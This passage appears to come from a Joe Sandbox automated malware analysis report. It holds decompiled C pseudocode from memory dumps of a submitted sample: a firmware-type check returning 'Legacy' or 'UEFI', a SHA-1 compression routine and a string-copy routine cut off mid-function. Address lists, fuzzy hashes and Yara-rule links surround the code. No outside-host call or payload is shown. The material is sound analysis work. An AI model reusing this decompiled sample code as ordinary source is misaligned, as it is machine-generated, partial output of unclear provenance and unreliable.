					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}

0x017de547
0x017de549
0x017de54f
0x017de553
0x017de557
0x017de55a
0x017de55c
0x017de55f
0x017de561
0x017de567
0x017de56b
0x017de7e2
0x00000000
0x017de571
0x017de575
0x017de577
0x017de57b
0x017de57c
0x017de57d
0x017de57e
0x017de57f
0x017de588
0x017de58f
0x017de591
0x017de592
0x017de592
0x017de596
0x017de59e
0x017de5a0
0x017de5a6
0x017de61d
0x017de61d
0x017de621
0x017de623
0x017de630
0x017de630
0x017de7e6
0x017de7eb
0x017de7ed
0x017de7f4
0x017de7fa
0x017de7ff
0x017de7ff
0x017de80a
0x017de812
0x017de812
0x017de5ab
0x017de5b4
0x017de5b9
0x017de5be
0x017de5c0
0x017de5c2
0x017de5c8
0x017de5c9
0x017de5cb
0x017de5cc
0x017de5d5
0x017de5e4
0x017de5f1
0x017de5f8
0x017de5f8
0x017de5d5
0x017de602
0x017de616
0x017de63d
0x017de644
0x017de64d
0x017de652
0x017de657
0x017de659
0x017de65b
0x017de661
0x017de662
0x017de664
0x017de665
0x017de66e
0x017de67d
0x017de68a
0x017de691
0x017de691
0x017de66e
0x017de6b0
0x00000000
0x017de6b6
0x017de6bd
0x017de6c7
0x017de6d7
0x017de6d9
0x017de6db
0x017de6de
0x017de6e3
0x017de6f3
0x017de6fc
0x017de700
0x017de700
0x017de704
0x017de70a
0x017de70a
0x017de713
0x017de716
0x017de719
0x017de720
0x017de761
0x017de76b
0x017de774
0x017de77a
0x017de77a
0x017de78a
0x017de791
0x017de799
0x017de79b
0x017de79f
0x017de7aa
0x017de7c0
0x017de7ac
0x017de7b2
0x017de7b9
0x017de7b9
0x017de7c7
0x017de806
0x00000000
0x017de7c9
0x017de7d1
0x017de7d8
0x00000000
0x017de7d8
0x00000000
0x00000000
0x017de722
0x017de72e
0x017de748
0x017de74c
0x017de754
0x017de756
0x017de75c
0x017de75c
0x00000000
0x017de75c
0x017de758
0x017de758
0x00000000
0x017de758
0x017de750
0x00000000
0x00000000
0x017de752
0x00000000
0x017de752
0x017de730
0x017de735
0x017de73d
0x017de73f
0x00000000
0x00000000
0x017de741
0x017de741
0x00000000
0x017de741
0x017de739
0x00000000
0x00000000
0x017de73b
0x00000000
0x017de73b
0x017de722
0x017de720
0x017de6b0
0x017de618
0x00000000
0x017de618

Strings

`, xrefs: 017DE670
`, xrefs: 017DE5D7

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction ID: 0a5dfaa28546267fc39bcaea0cfb54760733c9f0bd12521aee533e3fe75d39d2
Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction Fuzzy Hash: E5917F3120434A9BE766CE29C845B1BFBF5BF84724F14892DFA95CB280EB74E904CB51

Uniqueness

Uniqueness Score: -1.00%

Function 017951BE Relevance: 2.7, Strings: 2, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E017951BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x17f05f0);
				E0176D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					L0172EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E017953CA(0);
						return E0176D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0175F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = L01733690(1, _t117, 0x16f1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0175AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L01734620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0175AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0179500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E01759860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}

0x017951be
0x017951c3
0x017951c8
0x017951cd
0x017951d0
0x017951d3
0x017951d8
0x017951db
0x017951de
0x017951e0
0x017951e3
0x017951e6
0x017951e8
0x01795342
0x01795351
0x01795356
0x0179535a
0x01795360
0x01795363
0x01795366
0x01795369
0x01795369
0x0179536b
0x0179536b
0x01795370
0x017953a3
0x017953a4
0x017953a6
0x017953ab
0x017953ab
0x017953ae
0x017953ae
0x017953b5
0x017953bf
0x017953bf
0x01795375
0x01795396
0x017953a0
0x017953a0
0x00000000
0x01795396
0x01795377
0x01795379
0x0179537f
0x0179538c
0x01795390
0x00000000
0x01795390
0x017951ee
0x017951f1
0x01795301
0x01795310
0x01795315
0x01795318
0x0179531b
0x01795320
0x0179532e
0x01795331
0x00000000
0x01795331
0x01795328
0x01795329
0x00000000
0x01795329
0x017951fa
0x01795235
0x01795236
0x01795239
0x0179523f
0x01795240
0x01795241
0x01795242
0x01795246
0x01795247
0x0179524e
0x01795251
0x01795267
0x01795269
0x0179526e
0x0179527d
0x0179527e
0x01795281
0x01795282
0x01795287
0x01795288
0x0179528a
0x0179528f
0x01795294
0x00000000
0x00000000
0x0179529a
0x0179529c
0x0179529e
0x0179529e
0x017952a4
0x017952b0
0x00000000
0x00000000
0x017952ba
0x017952bc
0x017952bc
0x017952d4
0x017952d9
0x017952dc
0x017952e1
0x00000000
0x00000000
0x017952e7
0x017952f4
0x00000000
0x017952f4
0x01795270
0x00000000
0x01795270
0x017951fc
0x017951fd
0x01795202
0x01795203
0x01795205
0x0179520a
0x0179520f
0x00000000
0x00000000
0x0179521b
0x01795226
0x0179522b
0x0179521d
0x0179521d
0x01795222
0x01795222
0x0179522d
0x00000000

Strings

Legacy, xrefs: 01795226
UEFI, xrefs: 0179521D

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 2bb6dd338047ff418d3c73a257a3d7e7d2d27bd314de33a06ac3f6e096e1ca87
Instruction ID: 09b59afc1992fe8eac3696c898fa80d6374a53c5a99a882e2cf94fc5af17172f
Opcode Fuzzy Hash: 2bb6dd338047ff418d3c73a257a3d7e7d2d27bd314de33a06ac3f6e096e1ca87
Instruction Fuzzy Hash: F4518CB1A046199FDF26DFA8D840AAEFBF8FF48704F14406EE649EB241D6709904CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00A89E50 Relevance: 1.7, Strings: 1, Instructions: 423
COMMONCrypto

Download Yara Rule

C-Code - Quality: 73%

			E00A89E50(signed int* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v304;
				signed char* _t277;
				signed int* _t278;
				signed int _t279;
				signed int _t285;
				signed int _t288;
				signed int _t292;
				signed int _t295;
				signed int _t299;
				signed int _t303;
				signed int _t305;
				signed int _t311;
				signed int _t318;
				signed int _t320;
				signed int _t323;
				signed int _t325;
				signed int _t334;
				signed int _t340;
				signed int _t341;
				signed int _t346;
				signed int _t353;
				signed int _t357;
				signed int _t358;
				signed int _t362;
				signed int _t365;
				signed int _t369;
				signed int _t370;
				signed int _t399;
				signed int _t404;
				signed int _t410;
				signed int _t413;
				signed int _t420;
				signed int _t423;
				signed int _t432;
				signed int _t434;
				signed int _t437;
				signed int _t445;
				signed int _t459;
				signed int _t462;
				signed int _t463;
				signed int _t464;
				signed int _t470;
				signed int _t478;
				signed int _t479;
				signed int* _t480;
				signed int* _t481;
				signed int _t488;
				signed int _t491;
				signed int _t496;
				signed int _t499;
				signed int _t502;
				signed int _t505;
				signed int _t506;
				signed int _t510;
				signed int _t522;
				signed int _t525;
				signed int _t532;
				void* _t536;

				_t481 = _a4;
				_t353 = 0;
				_t2 =  &(_t481[7]); // 0x1b
				_t277 = _t2;
				do {
					 *(_t536 + _t353 * 4 - 0x14c) = ((( *(_t277 - 1) & 0x000000ff) << 0x00000008 |  *_t277 & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x148) = (((_t277[3] & 0x000000ff) << 0x00000008 | _t277[4] & 0x000000ff) << 0x00000008 | _t277[5] & 0x000000ff) << 0x00000008 | _t277[6] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x144) = (((_t277[7] & 0x000000ff) << 0x00000008 | _t277[8] & 0x000000ff) << 0x00000008 | _t277[9] & 0x000000ff) << 0x00000008 | _t277[0xa] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x140) = (((_t277[0xb] & 0x000000ff) << 0x00000008 | _t277[0xc] & 0x000000ff) << 0x00000008 | _t277[0xd] & 0x000000ff) << 0x00000008 | _t277[0xe] & 0x000000ff;
					_t353 = _t353 + 4;
					_t277 =  &(_t277[0x10]);
				} while (_t353 < 0x10);
				_t278 =  &_v304;
				_v8 = 0x10;
				do {
					_t399 =  *(_t278 - 0x18);
					_t459 =  *(_t278 - 0x14);
					_t357 =  *(_t278 - 0x20) ^ _t278[5] ^  *_t278 ^ _t399;
					asm("rol ecx, 1");
					asm("rol ebx, 1");
					_t278[9] =  *(_t278 - 0x1c) ^ _t278[6] ^ _t278[1] ^ _t459;
					_t278[8] = _t357;
					_t318 = _t278[7] ^  *(_t278 - 0x10) ^ _t278[2];
					_t278 =  &(_t278[4]);
					asm("rol ebx, 1");
					asm("rol edx, 1");
					_t46 =  &_v8;
					 *_t46 = _v8 - 1;
					_t278[6] = _t318 ^ _t399;
					_t278[7] =  *(_t278 - 0x1c) ^  *(_t278 - 4) ^ _t357 ^ _t459;
				} while ( *_t46 != 0);
				_t320 =  *_t481;
				_t279 = _t481[1];
				_t358 = _t481[2];
				_t404 = _t481[3];
				_v12 = _t320;
				_v16 = _t481[4];
				_v8 = 0;
				do {
					asm("rol ebx, 0x5");
					_t462 = _v8;
					_t488 = _t320 + ( !_t279 & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x14c)) + _v16 + 0x5a827999;
					_t323 = _v12;
					asm("ror eax, 0x2");
					_v16 = _t404;
					_v12 = _t488;
					asm("rol esi, 0x5");
					_v8 = _t358;
					_t410 = _t488 + ( !_t323 & _t358 | _t279 & _t323) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x148)) + _v16 + 0x5a827999;
					_t491 = _t279;
					asm("ror ebx, 0x2");
					_v16 = _v8;
					_t362 = _v12;
					_v8 = _t323;
					_t325 = _v8;
					_v12 = _t410;
					asm("rol edx, 0x5");
					_t285 = _t410 + ( !_t362 & _t491 | _t323 & _t362) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x144)) + _v16 + 0x5a827999;
					_t413 = _v12;
					_v16 = _t491;
					asm("ror ecx, 0x2");
					_v8 = _t362;
					_v12 = _t285;
					asm("rol eax, 0x5");
					_v16 = _t325;
					_t496 = _t285 + ( !_t413 & _t325 | _t362 & _t413) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x140)) + _v16 + 0x5a827999;
					_t358 = _v12;
					_t288 = _v8;
					asm("ror edx, 0x2");
					_v8 = _t413;
					_v12 = _t496;
					asm("rol esi, 0x5");
					_v16 = _t288;
					_t279 = _v12;
					_t499 = _t496 + ( !_t358 & _t288 | _t413 & _t358) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x13c)) + _v16 + 0x5a827999;
					_t404 = _v8;
					asm("ror ecx, 0x2");
					_t463 = _t462 + 5;
					_t320 = _t499;
					_v12 = _t320;
					_v8 = _t463;
				} while (_t463 < 0x14);
				_t464 = 0x14;
				do {
					asm("rol esi, 0x5");
					asm("ror eax, 0x2");
					_v16 = _t404;
					_t502 = _t499 + (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
					_t334 = _v12;
					_v12 = _t502;
					asm("rol esi, 0x5");
					_t420 = _t502 + (_t358 ^ _t279 ^ _t334) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
					asm("ror ebx, 0x2");
					_t505 = _t279;
					_v16 = _t358;
					_t365 = _v12;
					_v12 = _t420;
					asm("rol edx, 0x5");
					asm("ror ecx, 0x2");
					_t292 = _t420 + (_t279 ^ _t334 ^ _t365) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
					_t423 = _v12;
					_v8 = _t334;
					_v8 = _t365;
					_v12 = _t292;
					asm("rol eax, 0x5");
					_t464 = _t464 + 5;
					_t358 = _v12;
					asm("ror edx, 0x2");
					_t146 = _t505 + 0x6ed9eba1; // 0x6ed9eb9f
					_t506 = _t292 + (_t334 ^ _v8 ^ _t423) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x154)) + _t146;
					_t295 = _v8;
					_v8 = _t423;
					_v12 = _t506;
					asm("rol esi, 0x5");
					_t404 = _v8;
					_t499 = _t506 + (_t295 ^ _v8 ^ _t358) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x150)) + _t334 + 0x6ed9eba1;
					_v16 = _t295;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
				} while (_t464 < 0x28);
				_v8 = 0x28;
				do {
					asm("rol esi, 0x5");
					_v16 = _t404;
					asm("ror eax, 0x2");
					_t510 = ((_t358 | _t279) & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _v8 * 4 - 0x14c)) + _t499 + _v16 - 0x70e44324;
					_t470 = _v12;
					_v12 = _t510;
					asm("rol esi, 0x5");
					_t340 = _v8;
					asm("ror edi, 0x2");
					_t432 = ((_t279 | _t470) & _t358 | _t279 & _t470) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x148)) + _t510 + _v16 - 0x70e44324;
					_v16 = _t358;
					_t369 = _v12;
					_v12 = _t432;
					asm("rol edx, 0x5");
					_v8 = _t279;
					_t434 = ((_t470 | _t369) & _t279 | _t470 & _t369) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x144)) + _t432 + _v16 - 0x70e44324;
					asm("ror ecx, 0x2");
					_v16 = _v8;
					_t299 = _v12;
					_v8 = _t470;
					_v12 = _t434;
					asm("rol edx, 0x5");
					asm("ror eax, 0x2");
					_t522 = ((_t369 | _t299) & _t470 | _t369 & _t299) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x140)) + _t434 + _v16 - 0x70e44324;
					_v16 = _v8;
					_t437 = _t369;
					_t358 = _v12;
					_v8 = _t437;
					_v12 = _t522;
					asm("rol esi, 0x5");
					_v16 = _v8;
					_t499 = ((_t299 | _t358) & _t437 | _t299 & _t358) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x13c)) + _t522 + _v16 - 0x70e44324;
					_t404 = _t299;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
					_t341 = _t340 + 5;
					_v8 = _t341;
				} while (_t341 < 0x3c);
				_t478 = 0x3c;
				_v8 = 0x3c;
				do {
					asm("rol esi, 0x5");
					_t479 = _v8;
					asm("ror eax, 0x2");
					_t525 = (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t478 * 4 - 0x14c)) + _t499 + _v16 - 0x359d3e2a;
					_t346 = _v12;
					_v16 = _t404;
					_v12 = _t525;
					asm("rol esi, 0x5");
					asm("ror ebx, 0x2");
					_t445 = (_t358 ^ _t279 ^ _t346) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x148)) + _t525 + _v16 - 0x359d3e2a;
					_v16 = _t358;
					_t370 = _v12;
					_v12 = _t445;
					asm("rol edx, 0x5");
					_v16 = _t279;
					asm("ror ecx, 0x2");
					_t303 = (_t279 ^ _t346 ^ _t370) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x144)) + _t445 + _v16 - 0x359d3e2a;
					_t404 = _v12;
					_v12 = _t303;
					asm("rol eax, 0x5");
					_v16 = _t346;
					_t532 = (_t346 ^ _t370 ^ _t404) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x140)) + _t303 + _v16 - 0x359d3e2a;
					_t305 = _t370;
					_v8 = _t346;
					asm("ror edx, 0x2");
					_v8 = _t370;
					_t358 = _v12;
					_v12 = _t532;
					asm("rol esi, 0x5");
					_t478 = _t479 + 5;
					_t499 = (_t305 ^ _t404 ^ _t358) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x13c)) + _t532 + _v16 - 0x359d3e2a;
					_v16 = _t305;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v8 = _t404;
					_v12 = _t499;
					_v8 = _t478;
				} while (_t478 < 0x50);
				_t480 = _a4;
				_t480[2] = _t480[2] + _t358;
				_t480[3] = _t480[3] + _t404;
				_t311 = _t480[4] + _v16;
				 *_t480 =  *_t480 + _t499;
				_t480[1] = _t480[1] + _t279;
				_t480[4] = _t311;
				_t480[0x17] = 0;
				return _t311;
			}

0x00a89e5b
0x00a89e5f
0x00a89e61
0x00a89e61
0x00a89e64
0x00a89e86
0x00a89eac
0x00a89ed2
0x00a89ef4
0x00a89efb
0x00a89efe
0x00a89f01
0x00a89f0a
0x00a89f10
0x00a89f17
0x00a89f28
0x00a89f2b
0x00a89f2e
0x00a89f32
0x00a89f34
0x00a89f36
0x00a89f3f
0x00a89f42
0x00a89f45
0x00a89f50
0x00a89f56
0x00a89f58
0x00a89f58
0x00a89f5b
0x00a89f5e
0x00a89f5e
0x00a89f63
0x00a89f65
0x00a89f68
0x00a89f6b
0x00a89f71
0x00a89f74
0x00a89f77
0x00a89f80
0x00a89f86
0x00a89f8f
0x00a89f9e
0x00a89fa5
0x00a89fa8
0x00a89fab
0x00a89fb4
0x00a89fb7
0x00a89fba
0x00a89fd2
0x00a89fd9
0x00a89fdb
0x00a89fde
0x00a89fe1
0x00a89fea
0x00a89ff1
0x00a89ff4
0x00a89ff7
0x00a8a006
0x00a8a00d
0x00a8a010
0x00a8a013
0x00a8a01c
0x00a8a026
0x00a8a029
0x00a8a035
0x00a8a038
0x00a8a03f
0x00a8a042
0x00a8a045
0x00a8a04a
0x00a8a04d
0x00a8a056
0x00a8a067
0x00a8a06a
0x00a8a06d
0x00a8a074
0x00a8a077
0x00a8a07a
0x00a8a07d
0x00a8a07f
0x00a8a082
0x00a8a085
0x00a8a08e
0x00a8a093
0x00a8a093
0x00a8a0a8
0x00a8a0ab
0x00a8a0ae
0x00a8a0b5
0x00a8a0b8
0x00a8a0bb
0x00a8a0d0
0x00a8a0d7
0x00a8a0da
0x00a8a0de
0x00a8a0e1
0x00a8a0e6
0x00a8a0e9
0x00a8a0f8
0x00a8a0fb
0x00a8a102
0x00a8a105
0x00a8a108
0x00a8a10b
0x00a8a10e
0x00a8a116
0x00a8a124
0x00a8a127
0x00a8a12a
0x00a8a12a
0x00a8a131
0x00a8a134
0x00a8a137
0x00a8a13f
0x00a8a14d
0x00a8a150
0x00a8a157
0x00a8a15a
0x00a8a15d
0x00a8a160
0x00a8a163
0x00a8a16c
0x00a8a173
0x00a8a173
0x00a8a179
0x00a8a192
0x00a8a195
0x00a8a19c
0x00a8a19f
0x00a8a1a2
0x00a8a1b4
0x00a8a1be
0x00a8a1c1
0x00a8a1ca
0x00a8a1cd
0x00a8a1d4
0x00a8a1d7
0x00a8a1dd
0x00a8a1f0
0x00a8a1f7
0x00a8a1fa
0x00a8a1fd
0x00a8a200
0x00a8a209
0x00a8a20c
0x00a8a21f
0x00a8a222
0x00a8a22c
0x00a8a22f
0x00a8a231
0x00a8a23a
0x00a8a23d
0x00a8a250
0x00a8a256
0x00a8a259
0x00a8a260
0x00a8a262
0x00a8a265
0x00a8a268
0x00a8a26b
0x00a8a26e
0x00a8a271
0x00a8a27a
0x00a8a27f
0x00a8a282
0x00a8a282
0x00a8a295
0x00a8a298
0x00a8a29b
0x00a8a2a2
0x00a8a2a5
0x00a8a2a8
0x00a8a2ab
0x00a8a2be
0x00a8a2c1
0x00a8a2cc
0x00a8a2cf
0x00a8a2db
0x00a8a2de
0x00a8a2e4
0x00a8a2e7
0x00a8a2ea
0x00a8a2f1
0x00a8a301
0x00a8a304
0x00a8a30a
0x00a8a30d
0x00a8a314
0x00a8a316
0x00a8a319
0x00a8a31c
0x00a8a31f
0x00a8a322
0x00a8a329
0x00a8a338
0x00a8a33b
0x00a8a342
0x00a8a345
0x00a8a348
0x00a8a34b
0x00a8a34e
0x00a8a351
0x00a8a354
0x00a8a35d
0x00a8a36e
0x00a8a376
0x00a8a37c
0x00a8a37f
0x00a8a381
0x00a8a384
0x00a8a387
0x00a8a394

Strings

(, xrefs: 00A8A16C

Memory Dump Source

Source File: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000000.00000002.288819285.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.288891710.0000000000A9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.288903814.0000000000AA0000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a80000_7pECKdsaig.jbxd

Yara matches

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
Instruction ID: 9cc5312d71b5b4870d0ff9dad73eecfb1d0d60de741bfe028ff4e2e79d66709d
Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
Instruction Fuzzy Hash: 67021CB6E006189FDB54CF9AC8805DDFBF2FF88314F1AC1AAD859A7315D6746A418F80

Uniqueness

Uniqueness Score: -1.00%

Function 0171B171 Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0171B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x17ef7a8);
				E0176D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0176D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0175D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0175F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
